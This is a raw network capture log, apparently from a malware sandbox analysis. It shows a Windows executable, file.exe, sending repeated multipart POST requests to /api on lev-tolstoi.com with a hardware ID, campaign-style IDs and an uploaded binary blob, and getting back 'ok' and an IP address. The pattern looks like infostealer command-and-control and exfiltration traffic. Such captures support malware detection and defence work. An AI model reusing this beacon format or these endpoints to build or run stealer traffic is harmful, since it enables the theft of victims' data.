                                                                                                                                                                                                                                            2025-01-02 19:16:40 UTC1369INData Raw: 55 52 4c 67 4b 72 6d 66 6d 48 56 5a 72 71 5a 51 59 39 2f 66 4d 57 4b 6e 48 4c 4a 4b 31 32 35 6b 64 61 49 2b 47 58 56 6e 4e 75 4e 61 47 71 68 35 38 39 7a 5a 50 46 47 2b 37 67 63 73 37 74 77 34 5a 4b 6b 50 2f 56 2b 4c 66 79 70 2f 70 58 46 4b 4a 32 73 31 35 31 6b 53 72 48 6e 78 6e 5a 74 79 55 61 4f 6e 56 32 54 4a 30 44 4e 73 71 78 65 79 51 63 46 6a 62 33 79 75 4e 52 52 6f 4a 33 57 6e 55 51 62 67 4b 72 6d 7a 73 45 6b 55 68 35 51 66 63 35 58 49 64 32 4f 6d 57 65 55 41 79 57 56 6d 63 4b 59 33 47 32 74 74 4d 75 78 61 46 61 52 2b 38 4a 6d 52 66 56 4f 6a 72 31 74 67 30 64 63 30 5a 36 55 57 73 6b 69 46 4b 43 70 2f 73 58 46 4b 4a 30 49 73 37 46 67 59 34 47 32 33 68 64 64 37 57 75 62 32 48 32 44 53 31 7a 46 68 70 68 69 37 53 4d 42 75 62 6e 6d 76 4e 78 46 6f 59 7a 37
                                                                                                                                                                                                                                            Data Ascii: URLgKrmfmHVZrqZQY9/fMWKnHLJK125kdaI+GXVnNuNaGqh589zZPFG+7gcs7tw4ZKkP/V+Lfyp/pXFKJ2s151kSrHnxnZtyUaOnV2TJ0DNsqxeyQcFjb3yuNRRoJ3WnUQbgKrmzsEkUh5Qfc5XId2OmWeUAyWVmcKY3G2ttMuxaFaR+8JmRfVOjr1tg0dc0Z6UWskiFKCp/sXFKJ0Is7FgY4G23hdd7Wub2H2DS1zFhphi7SMBubnmvNxFoYz7
                                                                                                                                                                                                                                            2025-01-02 19:16:40 UTC1369INData Raw: 33 7a 32 6e 34 56 39 57 36 32 38 57 47 50 66 31 6a 74 69 70 52 2b 38 52 63 39 71 62 58 32 69 50 68 34 6e 4b 58 76 67 54 6c 37 34 4d 74 65 58 68 47 74 56 71 4b 56 4a 64 35 76 4f 65 58 33 71 48 72 45 41 6e 53 5a 70 63 36 49 31 45 6d 74 6e 50 2b 70 57 44 4b 39 31 2f 70 57 63 62 6c 79 68 71 56 52 6b 30 4e 34 78 64 71 59 58 72 30 58 58 64 43 6f 32 36 54 59 4b 4a 7a 39 37 30 56 45 4f 73 48 47 37 72 59 46 2f 51 4b 32 6a 55 79 7a 45 6e 79 34 6b 72 52 58 39 47 49 56 67 5a 58 47 71 50 68 4e 75 61 7a 62 69 58 78 75 68 64 50 32 57 6e 58 78 51 6f 4b 39 61 5a 74 6a 51 50 57 32 74 45 62 70 44 31 79 59 6b 4f 4b 34 70 55 6a 38 6e 45 75 42 45 45 4c 41 79 35 74 4b 4f 50 46 47 71 37 67 63 73 33 39 73 34 59 4b 30 56 75 30 58 44 61 32 74 33 71 44 45 64 59 32 77 79 34 56 63 54
                                                                                                                                                                                                                                            Data Ascii: 3z2n4V9W628WGPf1jtipR+8Rc9qbX2iPh4nKXvgTl74MteXhGtVqKVJd5vOeX3qHrEAnSZpc6I1EmtnP+pWDK91/pWcblyhqVRk0N4xdqYXr0XXdCo26TYKJz970VEOsHG7rYF/QK2jUyzEny4krRX9GIVgZXGqPhNuazbiXxuhdP2WnXxQoK9aZtjQPW2tEbpD1yYkOK4pUj8nEuBEELAy5tKOPFGq7gcs39s4YK0Vu0XDa2t3qDEdY2wy4VcT
                                                                                                                                                                                                                                            2025-01-02 19:16:40 UTC1369INData Raw: 58 58 65 31 72 6d 39 68 39 73 30 64 51 39 61 61 6b 57 76 6c 4c 45 59 48 68 34 70 44 73 41 62 57 77 2b 36 6c 73 54 6f 33 54 2f 6c 35 74 75 58 36 61 74 56 43 79 56 6b 54 42 38 36 6b 48 39 59 39 4a 77 59 48 2b 6c 4a 78 6c 6d 5a 43 33 71 52 6c 37 75 4d 75 69 62 68 6a 77 4f 73 4c 35 49 61 38 53 66 4c 69 53 74 46 66 30 59 68 57 42 6a 66 71 34 33 48 48 56 69 50 65 68 5a 46 36 6c 32 38 5a 2b 58 65 46 4b 68 71 31 78 67 30 4e 59 30 61 36 34 51 73 30 6e 4b 4a 69 51 34 72 69 6c 53 50 79 63 61 2f 46 55 53 72 54 4c 6d 30 6f 34 38 55 61 72 75 42 79 7a 58 33 7a 4a 6b 6f 42 2b 35 52 63 4e 73 62 33 69 69 4d 68 31 6a 59 54 2f 6f 56 68 57 70 63 2f 2b 5a 6e 58 64 51 71 36 31 5a 61 70 75 66 64 32 4f 79 57 65 55 41 35 58 31 6e 64 4b 35 78 44 53 6c 2b 65 2b 42 61 58 76 67 79 38
                                                                                                                                                                                                                                            Data Ascii: XXe1rm9h9s0dQ9aakWvlLEYHh4pDsAbWw+6lsTo3T/l5tuX6atVCyVkTB86kH9Y9JwYH+lJxlmZC3qRl7uMuibhjwOsL5Ia8SfLiStFf0YhWBjfq43HHViPehZF6l28Z+XeFKhq1xg0NY0a64Qs0nKJiQ4rilSPyca/FUSrTLm0o48UaruByzX3zJkoB+5RcNsb3iiMh1jYT/oVhWpc/+ZnXdQq61Zapufd2OyWeUA5X1ndK5xDSl+e+BaXvgy8
                                                                                                                                                                                                                                            2025-01-02 19:16:40 UTC1369INData Raw: 5a 35 76 5a 6d 4c 4e 4c 57 4c 48 57 38 46 4b 31 48 68 56 6b 6b 4f 4c 46 78 53 69 64 53 4f 4f 6c 59 47 62 5a 6a 74 4c 75 42 64 6c 47 32 71 55 68 6a 6d 35 39 33 59 75 70 42 37 67 36 46 59 6e 73 34 38 57 46 41 50 44 4a 6f 73 41 5a 4d 76 7a 7a 67 33 49 45 38 44 76 54 67 48 33 36 62 69 58 63 6a 71 51 75 76 52 73 5a 77 61 54 2b 58 44 7a 56 39 61 6a 33 77 52 79 43 65 64 65 4f 52 6b 57 74 48 36 72 74 63 59 74 58 57 49 53 54 6b 57 62 49 41 6e 56 38 71 4d 4f 6b 4f 58 43 64 2f 65 37 38 57 4b 36 4e 38 39 35 75 42 62 52 75 42 74 46 4a 71 7a 4d 42 33 4b 75 6f 66 2f 52 69 56 4b 43 70 38 75 48 46 4b 4e 7a 56 67 73 67 56 4a 38 43 44 6d 30 6f 34 38 51 4f 62 32 44 53 4b 62 77 33 63 38 36 6c 36 2b 55 74 64 67 61 57 36 71 64 69 78 5a 53 54 7a 68 55 78 6d 77 4d 4e 65 58 67 33
                                                                                                                                                                                                                                            Data Ascii: Z5vZmLNLWLHW8FK1HhVkkOLFxSidSOOlYGbZjtLuBdlG2qUhjm593YupB7g6FYns48WFAPDJosAZMvzzg3IE8DvTgH36biXcjqQuvRsZwaT+XDzV9aj3wRyCedeORkWtH6rtcYtXWISTkWbIAnV8qMOkOXCd/e78WK6N895uBbRuBtFJqzMB3Kuof/RiVKCp8uHFKNzVgsgVJ8CDm0o48QOb2DSKbw3c86l6+UtdgaW6qdixZSTzhUxmwMNeXg3
                                                                                                                                                                                                                                            2025-01-02 19:16:40 UTC1369INData Raw: 58 6e 72 4c 78 6a 67 6b 35 46 6d 37 41 4a 30 30 4a 44 69 74 49 46 49 2f 4e 32 6d 38 41 30 33 33 49 71 75 44 32 57 55 57 73 4f 34 48 50 70 57 52 4a 53 54 79 57 66 70 44 31 33 52 73 65 37 38 79 56 56 6c 5a 48 4f 6c 52 48 37 5a 69 37 70 50 59 55 6d 43 48 6b 47 46 35 32 4e 38 35 59 37 77 49 2f 51 36 46 61 53 6f 67 6b 48 46 61 4a 31 68 31 70 30 35 65 2b 44 4c 4d 6e 35 6c 79 55 62 43 2f 45 6b 76 56 31 6a 5a 79 75 67 36 79 44 2b 74 51 53 7a 6a 6e 63 52 51 6e 50 32 6d 70 46 68 71 78 4d 71 48 4d 78 53 63 44 39 66 6b 50 50 73 53 66 4c 69 53 38 57 65 55 53 69 79 5a 34 4f 50 46 78 56 57 52 31 4b 65 46 56 43 4b 4d 31 78 36 4b 77 63 6c 47 6e 75 45 39 68 31 2f 41 30 64 61 41 6e 67 31 58 47 61 47 52 2f 76 79 42 53 4b 53 63 30 70 77 34 6e 34 44 71 35 6f 39 6b 38 54 75 62
                                                                                                                                                                                                                                            Data Ascii: XnrLxjgk5Fm7AJ00JDitIFI/N2m8A033IquD2WUWsO4HPpWRJSTyWfpD13Rse78yVVlZHOlRH7Zi7pPYUmCHkGF52N85Y7wI/Q6FaSogkHFaJ1h1p05e+DLMn5lyUbC/EkvV1jZyug6yD+tQSzjncRQnP2mpFhqxMqHMxScD9fkPPsSfLiS8WeUSiyZ4OPFxVWR1KeFVCKM1x6KwclGnuE9h1/A0daAng1XGaGR/vyBSKSc0pw4n4Dq5o9k8Tub
                                                                                                                                                                                                                                            2025-01-02 19:16:40 UTC1369INData Raw: 4a 4d 47 61 61 34 50 71 45 50 56 59 56 52 47 68 43 4d 56 64 32 52 35 79 31 45 54 72 45 7a 48 71 34 5a 37 52 75 53 49 58 48 72 59 6b 58 6b 6b 73 6c 6e 6c 41 4f 68 30 62 57 69 71 63 7a 35 67 61 6a 65 6e 53 56 43 35 4d 75 2f 63 7a 79 38 59 35 72 77 66 4e 4a 75 57 4e 48 61 34 48 37 35 57 78 69 46 55 52 6f 51 6a 46 58 64 6b 65 64 5a 62 47 72 5a 6e 2b 6f 79 51 51 6d 69 4c 76 46 68 38 32 4a 4d 53 58 75 67 6f 71 30 50 46 61 47 30 34 35 33 45 4b 4a 7a 39 37 79 6b 51 5a 73 48 47 37 75 61 30 2b 5a 37 43 74 58 32 4c 63 6b 58 6b 6b 70 6c 6e 6c 41 4d 68 30 62 57 69 71 66 52 56 39 59 48 76 34 47 41 66 67 5a 4c 6e 45 78 44 49 57 74 4f 34 48 4c 4a 7a 66 4f 6d 57 70 46 37 35 53 31 32 42 70 62 71 70 32 4c 46 6c 49 4d 4f 5a 47 45 37 46 2f 2f 59 71 70 51 6e 47 67 71 31 68 53
                                                                                                                                                                                                                                            Data Ascii: JMGaa4PqEPVYVRGhCMVd2R5y1ETrEzHq4Z7RuSIXHrYkXkkslnlAOh0bWiqcz5gajenSVC5Mu/czy8Y5rwfNJuWNHa4H75WxiFURoQjFXdkedZbGrZn+oyQQmiLvFh82JMSXugoq0PFaG0453EKJz97ykQZsHG7ua0+Z7CtX2LckXkkplnlAMh0bWiqfRV9YHv4GAfgZLnExDIWtO4HLJzfOmWpF75S12Bpbqp2LFlIMOZGE7F//YqpQnGgq1hS


                                                                                                                                                                                                                                            Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                                                            3192.168.2.749703172.67.157.2544434048C:\Users\user\Desktop\file.exe
                                                                                                                                                                                                                                            TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                            2025-01-02 19:16:41 UTC276OUTPOST /api HTTP/1.1
                                                                                                                                                                                                                                            Connection: Keep-Alive
                                                                                                                                                                                                                                            Content-Type: multipart/form-data; boundary=CRHWV3EVPVRBW
                                                                                                                                                                                                                                            User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36
                                                                                                                                                                                                                                            Content-Length: 12821
                                                                                                                                                                                                                                            Host: lev-tolstoi.com
                                                                                                                                                                                                                                            2025-01-02 19:16:41 UTC12821OUTData Raw: 2d 2d 43 52 48 57 56 33 45 56 50 56 52 42 57 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 68 77 69 64 22 0d 0a 0d 0a 31 43 41 46 39 43 42 33 46 33 46 38 33 35 43 42 38 38 42 39 46 39 37 42 36 30 45 44 36 31 38 44 0d 0a 2d 2d 43 52 48 57 56 33 45 56 50 56 52 42 57 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 70 69 64 22 0d 0a 0d 0a 32 0d 0a 2d 2d 43 52 48 57 56 33 45 56 50 56 52 42 57 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 6c 69 64 22 0d 0a 0d 0a 48 70 4f 6f 49 68 2d 2d 32 61 37 32 37 61 30 33 32 63 34 64 0d 0a 2d 2d 43 52 48 57
                                                                                                                                                                                                                                            Data Ascii: --CRHWV3EVPVRBWContent-Disposition: form-data; name="hwid"1CAF9CB3F3F835CB88B9F97B60ED618D--CRHWV3EVPVRBWContent-Disposition: form-data; name="pid"2--CRHWV3EVPVRBWContent-Disposition: form-data; name="lid"HpOoIh--2a727a032c4d--CRHW
                                                                                                                                                                                                                                            2025-01-02 19:16:41 UTC1126INHTTP/1.1 200 OK
                                                                                                                                                                                                                                            Date: Thu, 02 Jan 2025 19:16:41 GMT
                                                                                                                                                                                                                                            Content-Type: text/html; charset=UTF-8
                                                                                                                                                                                                                                            Transfer-Encoding: chunked
                                                                                                                                                                                                                                            Connection: close
                                                                                                                                                                                                                                            Set-Cookie: PHPSESSID=s6rtjv438a29pafu8q21aqu3pi; expires=Mon, 28 Apr 2025 13:03:20 GMT; Max-Age=9999999; path=/
                                                                                                                                                                                                                                            Expires: Thu, 19 Nov 1981 08:52:00 GMT
                                                                                                                                                                                                                                            Cache-Control: no-store, no-cache, must-revalidate
                                                                                                                                                                                                                                            Pragma: no-cache
                                                                                                                                                                                                                                            X-Frame-Options: DENY
                                                                                                                                                                                                                                            X-Content-Type-Options: nosniff
                                                                                                                                                                                                                                            X-XSS-Protection: 1; mode=block
                                                                                                                                                                                                                                            cf-cache-status: DYNAMIC
                                                                                                                                                                                                                                            vary: accept-encoding
                                                                                                                                                                                                                                            Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=NNT%2BCsTRuNKQUvAP1v925XZh1kObx4HeYJNFtdsZtBCcoYgr%2BDZrId8gSI6t%2F1snqmQD5h7aHAppjpsP0yPim2aOmy82ZflD9hhWKj32hV6AE10tDnKyQlrndT9Ylz5BRvk%3D"}],"group":"cf-nel","max_age":604800}
                                                                                                                                                                                                                                            NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                                                                                                                                                                                                            Server: cloudflare
                                                                                                                                                                                                                                            CF-RAY: 8fbd15bd8ffa4358-EWR
                                                                                                                                                                                                                                            alt-svc: h3=":443"; ma=86400
                                                                                                                                                                                                                                            server-timing: cfL4;desc="?proto=TCP&rtt=1634&min_rtt=1630&rtt_var=619&sent=8&recv=18&lost=0&retrans=0&sent_bytes=2836&recv_bytes=13755&delivery_rate=1754807&cwnd=206&unsent_bytes=0&cid=79e7343d66e5d9ee&ts=831&x=0"
                                                                                                                                                                                                                                            2025-01-02 19:16:41 UTC20INData Raw: 66 0d 0a 6f 6b 20 38 2e 34 36 2e 31 32 33 2e 31 38 39 0d 0a
                                                                                                                                                                                                                                            Data Ascii: fok 8.46.123.189
                                                                                                                                                                                                                                            2025-01-02 19:16:41 UTC5INData Raw: 30 0d 0a 0d 0a
                                                                                                                                                                                                                                            Data Ascii: 0


                                                                                                                                                                                                                                            Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                                                            4192.168.2.749704172.67.157.2544434048C:\Users\user\Desktop\file.exe
                                                                                                                                                                                                                                            TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                            2025-01-02 19:16:42 UTC272OUTPOST /api HTTP/1.1
                                                                                                                                                                                                                                            Connection: Keep-Alive
                                                                                                                                                                                                                                            Content-Type: multipart/form-data; boundary=2YLYEFNEH
                                                                                                                                                                                                                                            User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36
                                                                                                                                                                                                                                            Content-Length: 15029
                                                                                                                                                                                                                                            Host: lev-tolstoi.com
                                                                                                                                                                                                                                            2025-01-02 19:16:42 UTC15029OUTData Raw: 2d 2d 32 59 4c 59 45 46 4e 45 48 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 68 77 69 64 22 0d 0a 0d 0a 31 43 41 46 39 43 42 33 46 33 46 38 33 35 43 42 38 38 42 39 46 39 37 42 36 30 45 44 36 31 38 44 0d 0a 2d 2d 32 59 4c 59 45 46 4e 45 48 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 70 69 64 22 0d 0a 0d 0a 32 0d 0a 2d 2d 32 59 4c 59 45 46 4e 45 48 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 6c 69 64 22 0d 0a 0d 0a 48 70 4f 6f 49 68 2d 2d 32 61 37 32 37 61 30 33 32 63 34 64 0d 0a 2d 2d 32 59 4c 59 45 46 4e 45 48 0d 0a 43 6f 6e 74 65
                                                                                                                                                                                                                                            Data Ascii: --2YLYEFNEHContent-Disposition: form-data; name="hwid"1CAF9CB3F3F835CB88B9F97B60ED618D--2YLYEFNEHContent-Disposition: form-data; name="pid"2--2YLYEFNEHContent-Disposition: form-data; name="lid"HpOoIh--2a727a032c4d--2YLYEFNEHConte
                                                                                                                                                                                                                                            2025-01-02 19:16:43 UTC1127INHTTP/1.1 200 OK
                                                                                                                                                                                                                                            Date: Thu, 02 Jan 2025 19:16:43 GMT
                                                                                                                                                                                                                                            Content-Type: text/html; charset=UTF-8
                                                                                                                                                                                                                                            Transfer-Encoding: chunked
                                                                                                                                                                                                                                            Connection: close
                                                                                                                                                                                                                                            Set-Cookie: PHPSESSID=csvdstkbpktkpfuqebdlqumtj3; expires=Mon, 28 Apr 2025 13:03:22 GMT; Max-Age=9999999; path=/
                                                                                                                                                                                                                                            Expires: Thu, 19 Nov 1981 08:52:00 GMT
                                                                                                                                                                                                                                            Cache-Control: no-store, no-cache, must-revalidate
                                                                                                                                                                                                                                            Pragma: no-cache
                                                                                                                                                                                                                                            X-Frame-Options: DENY
                                                                                                                                                                                                                                            X-Content-Type-Options: nosniff
                                                                                                                                                                                                                                            X-XSS-Protection: 1; mode=block
                                                                                                                                                                                                                                            cf-cache-status: DYNAMIC
                                                                                                                                                                                                                                            vary: accept-encoding
                                                                                                                                                                                                                                            Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=I6lL0tEagcFLtflpayDBa2ogFWWE49cD0eLHDQGMyBzU7tXnd0RhDHHsfT6MXvUbfg2VR%2B%2FFpb06cf87HiZA1T5Xfgme%2BzNwDYwRsOIks7fm4qtfxU6RiOpDILJ6psqltis%3D"}],"group":"cf-nel","max_age":604800}
                                                                                                                                                                                                                                            NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                                                                                                                                                                                                            Server: cloudflare
                                                                                                                                                                                                                                            CF-RAY: 8fbd15c688dc4302-EWR
                                                                                                                                                                                                                                            alt-svc: h3=":443"; ma=86400
                                                                                                                                                                                                                                            server-timing: cfL4;desc="?proto=TCP&rtt=1744&min_rtt=1742&rtt_var=655&sent=10&recv=20&lost=0&retrans=0&sent_bytes=2835&recv_bytes=15959&delivery_rate=1676234&cwnd=252&unsent_bytes=0&cid=f27d71016f9b3414&ts=806&x=0"
                                                                                                                                                                                                                                            2025-01-02 19:16:43 UTC20INData Raw: 66 0d 0a 6f 6b 20 38 2e 34 36 2e 31 32 33 2e 31 38 39 0d 0a
                                                                                                                                                                                                                                            Data Ascii: fok 8.46.123.189
                                                                                                                                                                                                                                            2025-01-02 19:16:43 UTC5INData Raw: 30 0d 0a 0d 0a
                                                                                                                                                                                                                                            Data Ascii: 0


                                                                                                                                                                                                                                            Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                                                            5192.168.2.749705172.67.157.2544434048C:\Users\user\Desktop\file.exe
                                                                                                                                                                                                                                            TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                            2025-01-02 19:16:44 UTC277OUTPOST /api HTTP/1.1
                                                                                                                                                                                                                                            Connection: Keep-Alive
                                                                                                                                                                                                                                            Content-Type: multipart/form-data; boundary=BN7PQMTTJNCXTF
                                                                                                                                                                                                                                            User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36
                                                                                                                                                                                                                                            Content-Length: 20384
                                                                                                                                                                                                                                            Host: lev-tolstoi.com
                                                                                                                                                                                                                                            2025-01-02 19:16:44 UTC15331OUTData Raw: 2d 2d 42 4e 37 50 51 4d 54 54 4a 4e 43 58 54 46 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 68 77 69 64 22 0d 0a 0d 0a 31 43 41 46 39 43 42 33 46 33 46 38 33 35 43 42 38 38 42 39 46 39 37 42 36 30 45 44 36 31 38 44 0d 0a 2d 2d 42 4e 37 50 51 4d 54 54 4a 4e 43 58 54 46 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 70 69 64 22 0d 0a 0d 0a 33 0d 0a 2d 2d 42 4e 37 50 51 4d 54 54 4a 4e 43 58 54 46 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 6c 69 64 22 0d 0a 0d 0a 48 70 4f 6f 49 68 2d 2d 32 61 37 32 37 61 30 33 32 63 34 64 0d 0a 2d 2d 42
                                                                                                                                                                                                                                            Data Ascii: --BN7PQMTTJNCXTFContent-Disposition: form-data; name="hwid"1CAF9CB3F3F835CB88B9F97B60ED618D--BN7PQMTTJNCXTFContent-Disposition: form-data; name="pid"3--BN7PQMTTJNCXTFContent-Disposition: form-data; name="lid"HpOoIh--2a727a032c4d--B
                                                                                                                                                                                                                                            2025-01-02 19:16:44 UTC5053OUTData Raw: fe 28 58 da f6 d3 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 c0 36 d7 17 05 4b db 7e 1a 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 d8 e6 fa a3 60 69 db 4f 03 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 db 5c 5f 14 2c 6d fb 69 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 60 9b eb 8f 82 a5 6d 3f 0d 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 6c 73 7d 51 b0 b4 ed a7 01 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 80 6d ae 2f f8 f5 58 32 78 29 1e bc 14 fc db e0 ab e6 03 00
                                                                                                                                                                                                                                            Data Ascii: (X6K~`iO\_,mi`m?ls}Qm/X2x)
                                                                                                                                                                                                                                            2025-01-02 19:16:44 UTC1129INHTTP/1.1 200 OK
                                                                                                                                                                                                                                            Date: Thu, 02 Jan 2025 19:16:44 GMT
                                                                                                                                                                                                                                            Content-Type: text/html; charset=UTF-8
                                                                                                                                                                                                                                            Transfer-Encoding: chunked
                                                                                                                                                                                                                                            Connection: close
                                                                                                                                                                                                                                            Set-Cookie: PHPSESSID=5q5nulci3f4afssti5ntr09pdi; expires=Mon, 28 Apr 2025 13:03:23 GMT; Max-Age=9999999; path=/
                                                                                                                                                                                                                                            Expires: Thu, 19 Nov 1981 08:52:00 GMT
                                                                                                                                                                                                                                            Cache-Control: no-store, no-cache, must-revalidate
                                                                                                                                                                                                                                            Pragma: no-cache
                                                                                                                                                                                                                                            X-Frame-Options: DENY
                                                                                                                                                                                                                                            X-Content-Type-Options: nosniff
                                                                                                                                                                                                                                            X-XSS-Protection: 1; mode=block
                                                                                                                                                                                                                                            cf-cache-status: DYNAMIC
                                                                                                                                                                                                                                            vary: accept-encoding
                                                                                                                                                                                                                                            Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=8B%2FgCAnB5ALqfwen6jDo5T9gPiX2WZ4QAzCFkHVp8KGKBwlz2HDVK3lTr9RixxAVK7ozB3z91Kzc5Ey%2B8IBiA5Ig6Db9Ho8nDwKzJEPyr%2BHuarwFU8A9i4AQrSVx%2Bbj9cIU%3D"}],"group":"cf-nel","max_age":604800}
                                                                                                                                                                                                                                            NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                                                                                                                                                                                                            Server: cloudflare
                                                                                                                                                                                                                                            CF-RAY: 8fbd15d0bb7c8cc3-EWR
                                                                                                                                                                                                                                            alt-svc: h3=":443"; ma=86400
                                                                                                                                                                                                                                            server-timing: cfL4;desc="?proto=TCP&rtt=2069&min_rtt=1981&rtt_var=806&sent=11&recv=26&lost=0&retrans=0&sent_bytes=2835&recv_bytes=21341&delivery_rate=1474003&cwnd=224&unsent_bytes=0&cid=83a8135969cbe787&ts=662&x=0"
                                                                                                                                                                                                                                            2025-01-02 19:16:44 UTC20INData Raw: 66 0d 0a 6f 6b 20 38 2e 34 36 2e 31 32 33 2e 31 38 39 0d 0a
                                                                                                                                                                                                                                            Data Ascii: fok 8.46.123.189
                                                                                                                                                                                                                                            2025-01-02 19:16:44 UTC5INData Raw: 30 0d 0a 0d 0a
                                                                                                                                                                                                                                            Data Ascii: 0


                                                                                                                                                                                                                                            Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                                                            6192.168.2.749706172.67.157.2544434048C:\Users\user\Desktop\file.exe
                                                                                                                                                                                                                                            TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                            2025-01-02 19:16:46 UTC278OUTPOST /api HTTP/1.1
                                                                                                                                                                                                                                            Connection: Keep-Alive
                                                                                                                                                                                                                                            Content-Type: multipart/form-data; boundary=KNV94W4VEHFS6930
                                                                                                                                                                                                                                            User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36
                                                                                                                                                                                                                                            Content-Length: 1229
                                                                                                                                                                                                                                            Host: lev-tolstoi.com
                                                                                                                                                                                                                                            2025-01-02 19:16:46 UTC1229OUTData Raw: 2d 2d 4b 4e 56 39 34 57 34 56 45 48 46 53 36 39 33 30 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 68 77 69 64 22 0d 0a 0d 0a 31 43 41 46 39 43 42 33 46 33 46 38 33 35 43 42 38 38 42 39 46 39 37 42 36 30 45 44 36 31 38 44 0d 0a 2d 2d 4b 4e 56 39 34 57 34 56 45 48 46 53 36 39 33 30 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 70 69 64 22 0d 0a 0d 0a 31 0d 0a 2d 2d 4b 4e 56 39 34 57 34 56 45 48 46 53 36 39 33 30 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 6c 69 64 22 0d 0a 0d 0a 48 70 4f 6f 49 68 2d 2d 32 61 37 32 37 61 30 33 32 63 34
                                                                                                                                                                                                                                            Data Ascii: --KNV94W4VEHFS6930Content-Disposition: form-data; name="hwid"1CAF9CB3F3F835CB88B9F97B60ED618D--KNV94W4VEHFS6930Content-Disposition: form-data; name="pid"1--KNV94W4VEHFS6930Content-Disposition: form-data; name="lid"HpOoIh--2a727a032c4
                                                                                                                                                                                                                                            2025-01-02 19:16:46 UTC1129INHTTP/1.1 200 OK
                                                                                                                                                                                                                                            Date: Thu, 02 Jan 2025 19:16:46 GMT
                                                                                                                                                                                                                                            Content-Type: text/html; charset=UTF-8
                                                                                                                                                                                                                                            Transfer-Encoding: chunked
                                                                                                                                                                                                                                            Connection: close
                                                                                                                                                                                                                                            Set-Cookie: PHPSESSID=mam6b2g7j068k07lon3ctfssbp; expires=Mon, 28 Apr 2025 13:03:25 GMT; Max-Age=9999999; path=/
                                                                                                                                                                                                                                            Expires: Thu, 19 Nov 1981 08:52:00 GMT
                                                                                                                                                                                                                                            Cache-Control: no-store, no-cache, must-revalidate
                                                                                                                                                                                                                                            Pragma: no-cache
                                                                                                                                                                                                                                            X-Frame-Options: DENY
                                                                                                                                                                                                                                            X-Content-Type-Options: nosniff
                                                                                                                                                                                                                                            X-XSS-Protection: 1; mode=block
                                                                                                                                                                                                                                            cf-cache-status: DYNAMIC
                                                                                                                                                                                                                                            vary: accept-encoding
